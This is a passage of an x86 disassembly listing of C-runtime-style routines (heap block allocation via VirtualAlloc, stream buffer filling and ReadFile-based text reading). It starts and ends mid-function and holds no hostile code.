mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_418540
; ---------------------------------------------------------------------------
loc_41853D: ; CODE XREF: sub_418528+1A�j
shl eax, 1
inc ebx
loc_418540: ; CODE XREF: sub_418528+13�j
test eax, eax
jge short loc_41853D
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_418559: ; CODE XREF: sub_418528+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_418559
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_420190 ; VirtualAlloc
test eax, eax
jnz short loc_41858C
or eax, 0FFFFFFFFh
jmp loc_418629
; ---------------------------------------------------------------------------
loc_41858C: ; CODE XREF: sub_418528+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_4185DC
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_4185A4: ; CODE XREF: sub_418528+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_4185A4
mov edx, [ebp+var_4]
loc_4185DC: ; CODE XREF: sub_418528+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_418619
or [eax+4], edi
loc_418619: ; CODE XREF: sub_418528+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_418629: ; CODE XREF: sub_418528+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_418528 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41862E proc near ; CODE XREF: sub_4149EA+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_4187D0
test bl, 1
jnz loc_4187C9
add ebx, ecx
cmp esi, ebx
jg loc_4187C9
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_4186A3
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_4186A3: ; CODE XREF: sub_41862E+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_4186EE
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_4186CF
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_4186EE
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4186EE
; ---------------------------------------------------------------------------
loc_4186CF: ; CODE XREF: sub_41862E+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4186EE
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4186EE: ; CODE XREF: sub_41862E+7B�j
; sub_41862E+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_4187B7
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_418728
push 3Fh
pop edi
loc_418728: ; CODE XREF: sub_41862E+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_4187A5
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_41877C
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_418774
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_418774: ; CODE XREF: sub_41862E+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_41879C
; ---------------------------------------------------------------------------
loc_41877C: ; CODE XREF: sub_41862E+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_418792
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_418792: ; CODE XREF: sub_41862E+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_41879C: ; CODE XREF: sub_41862E+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_4187A5: ; CODE XREF: sub_41862E+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_4187BA
; ---------------------------------------------------------------------------
loc_4187B7: ; CODE XREF: sub_41862E+DE�j
mov edx, [ebp+arg_4]
loc_4187BA: ; CODE XREF: sub_41862E+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_418905
; ---------------------------------------------------------------------------
loc_4187C9: ; CODE XREF: sub_41862E+50�j
; sub_41862E+5A�j
xor eax, eax
jmp loc_418908
; ---------------------------------------------------------------------------
loc_4187D0: ; CODE XREF: sub_41862E+47�j
jge loc_418905
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_4187FB
push 3Fh
pop esi
loc_4187FB: ; CODE XREF: sub_41862E+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_418885
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_418814
push 3Fh
pop esi
loc_418814: ; CODE XREF: sub_41862E+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41885E
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_41883F
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41885B
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41885B
; ---------------------------------------------------------------------------
loc_41883F: ; CODE XREF: sub_41862E+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41885B
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41885B: ; CODE XREF: sub_41862E+208�j
; sub_41862E+20F�j ...
mov ebx, [ebp+arg_4]
loc_41885E: ; CODE XREF: sub_41862E+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_418885
push 3Fh
pop esi
loc_418885: ; CODE XREF: sub_41862E+1D1�j
; sub_41862E+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_4188FC
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_4188D3
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4188CB
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_4188CB: ; CODE XREF: sub_41862E+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_4188F3
; ---------------------------------------------------------------------------
loc_4188D3: ; CODE XREF: sub_41862E+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4188E9
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_4188E9: ; CODE XREF: sub_41862E+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_4188F3: ; CODE XREF: sub_41862E+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_4188FC: ; CODE XREF: sub_41862E+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_418905: ; CODE XREF: sub_41862E+196�j
; sub_41862E:loc_4187D0�j
xor eax, eax
inc eax
loc_418908: ; CODE XREF: sub_41862E+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41862E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41890D proc near ; CODE XREF: sub_4149EA+89�p
; sub_414C06+2D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, dword_47C984
mov edx, dword_47C988
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_41894A
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_418957
; ---------------------------------------------------------------------------
loc_41894A: ; CODE XREF: sub_41890D+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_418957: ; CODE XREF: sub_41890D+3B�j
mov eax, dword_47C990
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_418979
; ---------------------------------------------------------------------------
loc_418965: ; CODE XREF: sub_41890D+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41897E
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_418979: ; CODE XREF: sub_41890D+56�j
mov [ebp+arg_0], ebx
jb short loc_418965
loc_41897E: ; CODE XREF: sub_41890D+64�j
cmp ebx, [ebp+var_4]
jnz short loc_4189A7
mov ebx, edx
jmp short loc_418998
; ---------------------------------------------------------------------------
loc_418987: ; CODE XREF: sub_41890D+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41899F
add ebx, 14h
loc_418998: ; CODE XREF: sub_41890D+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_418987
loc_41899F: ; CODE XREF: sub_41890D+86�j
cmp ebx, eax
jz loc_418A3B
loc_4189A7: ; CODE XREF: sub_41890D+74�j
; sub_41890D+170�j
mov dword_47C990, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4189CE
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_418A04
loc_4189CE: ; CODE XREF: sub_41890D+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_418A01
loc_4189EA: ; CODE XREF: sub_41890D+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_4189EA
loc_418A01: ; CODE XREF: sub_41890D+DB�j
mov edx, [ebp+var_4]
loc_418A04: ; CODE XREF: sub_41890D+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_418A8D
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_418A8D
; ---------------------------------------------------------------------------
loc_418A2F: ; CODE XREF: sub_41890D+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_418A40
add ebx, 14h
mov [ebp+arg_0], ebx
loc_418A3B: ; CODE XREF: sub_41890D+94�j
cmp ebx, [ebp+var_4]
jb short loc_418A2F
loc_418A40: ; CODE XREF: sub_41890D+126�j
cmp ebx, [ebp+var_4]
jnz short loc_418A6B
mov ebx, edx
jmp short loc_418A52
; ---------------------------------------------------------------------------
loc_418A49: ; CODE XREF: sub_41890D+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_418A59
add ebx, 14h
loc_418A52: ; CODE XREF: sub_41890D+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_418A49
loc_418A59: ; CODE XREF: sub_41890D+140�j
cmp ebx, eax
jnz short loc_418A6B
call sub_418471
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_418A83
loc_418A6B: ; CODE XREF: sub_41890D+136�j
; sub_41890D+14E�j
push ebx
call sub_418528
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_4189A7
loc_418A83: ; CODE XREF: sub_41890D+15C�j
xor eax, eax
jmp loc_418C04
; ---------------------------------------------------------------------------
loc_418A8A: ; CODE XREF: sub_41890D+182�j
shl ecx, 1
inc edi
loc_418A8D: ; CODE XREF: sub_41890D+111�j
; sub_41890D+120�j
test ecx, ecx
jge short loc_418A8A
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_418AAE
push 3Fh
pop esi
loc_418AAE: ; CODE XREF: sub_41890D+19C�j
cmp esi, edi
jz loc_418BB7
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_418B1A
cmp edi, 20h
mov ebx, 80000000h
jge short loc_418AEE
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_418B17
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_418B1A
; ---------------------------------------------------------------------------
loc_418AEE: ; CODE XREF: sub_41890D+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_418B17
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_418B1A
; ---------------------------------------------------------------------------
loc_418B17: ; CODE XREF: sub_41890D+1D5�j
; sub_41890D+1FD�j
mov ebx, [ebp+arg_0]
loc_418B1A: ; CODE XREF: sub_41890D+1AF�j
; sub_41890D+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_418BC3
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_418BB4
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_418B8B
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_418B79
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_418B79: ; CODE XREF: sub_41890D+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_418BB4
; ---------------------------------------------------------------------------
loc_418B8B: ; CODE XREF: sub_41890D+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_418B9E
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_418B9E: ; CODE XREF: sub_41890D+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_418BB4: ; CODE XREF: sub_41890D+247�j
; sub_41890D+27C�j
mov ecx, [ebp+var_8]
loc_418BB7: ; CODE XREF: sub_41890D+1A3�j
test ecx, ecx
jz short loc_418BC6
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_418BC6
; ---------------------------------------------------------------------------
loc_418BC3: ; CODE XREF: sub_41890D+223�j
mov ecx, [ebp+var_8]
loc_418BC6: ; CODE XREF: sub_41890D+2AC�j
; sub_41890D+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_418BFC
cmp ebx, dword_47C980
jnz short loc_418BFC
mov ecx, [ebp+var_4]
cmp ecx, dword_47C998
jnz short loc_418BFC
and dword_47C980, 0
loc_418BFC: ; CODE XREF: sub_41890D+2D3�j
; sub_41890D+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_418C04: ; CODE XREF: sub_41890D+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_41890D endp
; =============== S U B R O U T I N E =======================================
sub_418C09 proc near ; CODE XREF: sub_4148B5+AA�p
; sub_415C85+44�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_418CE5
test al, 40h
jnz loc_418CE5
test al, 2
jz short loc_418C30
or eax, 20h
mov [esi+0Ch], eax
jmp loc_418CE5
; ---------------------------------------------------------------------------
loc_418C30: ; CODE XREF: sub_418C09+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_418C45
push esi
call sub_41BFBB
pop ecx
jmp short loc_418C4A
; ---------------------------------------------------------------------------
loc_418C45: ; CODE XREF: sub_418C09+31�j
mov eax, [esi+8]
mov [esi], eax
loc_418C4A: ; CODE XREF: sub_418C09+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_418EB7
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_418CD4
cmp eax, 0FFFFFFFFh
jz short loc_418CD4
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_418CA9
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_418C8F
mov edi, ecx
sar edi, 5
mov edi, dword_47C640[edi*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_418C94
; ---------------------------------------------------------------------------
loc_418C8F: ; CODE XREF: sub_418C09+6D�j
mov edi, offset dword_42E0E0
loc_418C94: ; CODE XREF: sub_418C09+84�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_418CA9
or edx, 2000h
mov [esi+0Ch], edx
loc_418CA9: ; CODE XREF: sub_418C09+64�j
; sub_418C09+95�j
cmp dword ptr [esi+18h], 200h
jnz short loc_418CC6
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_418CC6
test ch, 4
jnz short loc_418CC6
mov dword ptr [esi+18h], 1000h
loc_418CC6: ; CODE XREF: sub_418C09+A7�j
; sub_418C09+AF�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_418CD4: ; CODE XREF: sub_418C09+57�j
; sub_418C09+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_418CE5: ; CODE XREF: sub_418C09+A�j
; sub_418C09+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_418C09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418CEA proc near ; CODE XREF: sub_418EB7+52�p
; sub_41D38D+2A7�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_418EB0
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
lea edi, ds:47C640h[ecx*4]
mov eax, [edi]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_418EB0
test cl, 48h
jz short loc_418D50
mov al, [eax+5]
cmp al, 0Ah
jz short loc_418D50
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_418D50: ; CODE XREF: sub_418CEA+47�j
; sub_418CEA+4E�j
push 0
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
mov eax, [edi]
push edx
push dword ptr [eax+esi]
call ds:dword_42008C ; ReadFile
test eax, eax
jnz short loc_418DA2
call ds:dword_420008 ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_418D8A
call sub_419430
mov dword ptr [eax], 9
call sub_419439
mov [eax], esi
jmp short loc_418D9A
; ---------------------------------------------------------------------------
loc_418D8A: ; CODE XREF: sub_418CEA+8A�j
cmp eax, 6Dh
jz loc_418EB0
push eax
call sub_419442
pop ecx
loc_418D9A: ; CODE XREF: sub_418CEA+9E�j
or eax, 0FFFFFFFFh
jmp loc_418EB2
; ---------------------------------------------------------------------------
loc_418DA2: ; CODE XREF: sub_418CEA+7D�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [ecx]
test al, al
jns loc_418EAB
test edx, edx
jz short loc_418DC5
cmp byte ptr [ebx], 0Ah
jnz short loc_418DC5
or al, 4
jmp short loc_418DC7
; ---------------------------------------------------------------------------
loc_418DC5: ; CODE XREF: sub_418CEA+D0�j
; sub_418CEA+D5�j
and al, 0FBh
loc_418DC7: ; CODE XREF: sub_418CEA+D9�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
add ecx, eax
cmp eax, ecx
mov [ebp+arg_8], eax
mov [ebp+var_8], ecx
jnb loc_418EA5
loc_418DDF: ; CODE XREF: sub_418CEA+1A3�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_418E95
cmp al, 0Dh
jz short loc_418DFB
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_418E87
; ---------------------------------------------------------------------------
loc_418DFB: ; CODE XREF: sub_418CEA+104�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_418E15
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_418E10
add [ebp+arg_8], 2
jmp short loc_418E69
; ---------------------------------------------------------------------------
loc_418E10: ; CODE XREF: sub_418CEA+11E�j
mov [ebp+arg_8], eax
jmp short loc_418E83
; ---------------------------------------------------------------------------
loc_418E15: ; CODE XREF: sub_418CEA+115�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call ds:dword_42008C ; ReadFile
test eax, eax
jnz short loc_418E3D
call ds:dword_420008 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_418E83
loc_418E3D: ; CODE XREF: sub_418CEA+147�j
cmp [ebp+var_C], 0
jz short loc_418E83
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_418E5E
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_418E69
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
mov [ecx+esi+5], al
jmp short loc_418E86
; ---------------------------------------------------------------------------
loc_418E5E: ; CODE XREF: sub_418CEA+160�j
cmp ebx, [ebp+arg_4]
jnz short loc_418E6E
cmp [ebp+var_1], 0Ah
jnz short loc_418E6E
loc_418E69: ; CODE XREF: sub_418CEA+124�j
; sub_418CEA+167�j
mov byte ptr [ebx], 0Ah
jmp short loc_418E86
; ---------------------------------------------------------------------------
loc_418E6E: ; CODE XREF: sub_418CEA+177�j
; sub_418CEA+17D�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41B178
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_418E87
loc_418E83: ; CODE XREF: sub_418CEA+129�j
; sub_418CEA+151�j ...
mov byte ptr [ebx], 0Dh
loc_418E86: ; CODE XREF: sub_418CEA+172�j
; sub_418CEA+182�j
inc ebx
loc_418E87: ; CODE XREF: sub_418CEA+10C�j
; sub_418CEA+197�j
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_418DDF
jmp short loc_418EA5
; ---------------------------------------------------------------------------
loc_418E95: ; CODE XREF: sub_418CEA+FC�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_418EA5
or al, 2
mov [esi], al
loc_418EA5: ; CODE XREF: sub_418CEA+EF�j
; sub_418CEA+1A9�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_418EAB: ; CODE XREF: sub_418CEA+C8�j
mov eax, [ebp+var_8]
jmp short loc_418EB2
; ---------------------------------------------------------------------------
loc_418EB0: ; CODE XREF: sub_418CEA+16�j
; sub_418CEA+3E�j ...
xor eax, eax
loc_418EB2: ; CODE XREF: sub_418CEA+B3�j
; sub_418CEA+1C4�j
pop edi
pop esi
pop ebx
leave
retn
sub_418CEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418EB7 proc near ; CODE XREF: sub_4148B5+91�p
; sub_418C09+4A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00418F46 SIZE 0000001C BYTES
push 0Ch
push offset stru_429010
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C638
jnb short loc_418F46
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_418F46
push ebx
call sub_41CB8C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_418F16
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_418CEA
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_418F2D
; ---------------------------------------------------------------------------
loc_418F16: ; CODE XREF: sub_418EB7+49�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_418F2D: ; CODE XREF: sub_418EB7+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_418F3E
mov eax, [ebp+var_1C]
jmp short loc_418F5C
